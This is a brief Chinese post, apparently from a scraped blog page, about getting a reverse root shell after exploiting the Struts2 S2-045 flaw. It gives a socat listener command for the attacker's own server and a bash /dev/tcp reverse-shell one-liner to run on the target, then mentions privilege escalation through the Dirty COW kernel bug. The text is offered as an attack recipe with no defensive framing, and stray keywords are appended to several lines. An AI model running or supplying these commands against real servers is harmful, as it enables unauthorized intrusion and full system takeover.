st2045 漏洞反彈root shell

經過strust2 045漏洞,拿到root命令執行權限。 在本身服務器上,安裝socat,監聽端口如linux

socat TCP-LISTEN:8337 readline

在目標服務器上執行 shell

bash -i>& /dev/tcp/本身的ip/8337 0>&1

可在本身服務器上看到反彈的root shell,能夠執行命令,查看端口狀況。bash

查看linux版本,找內核漏洞服務器

髒牛提權,tcp

相關文章
相關標籤/搜索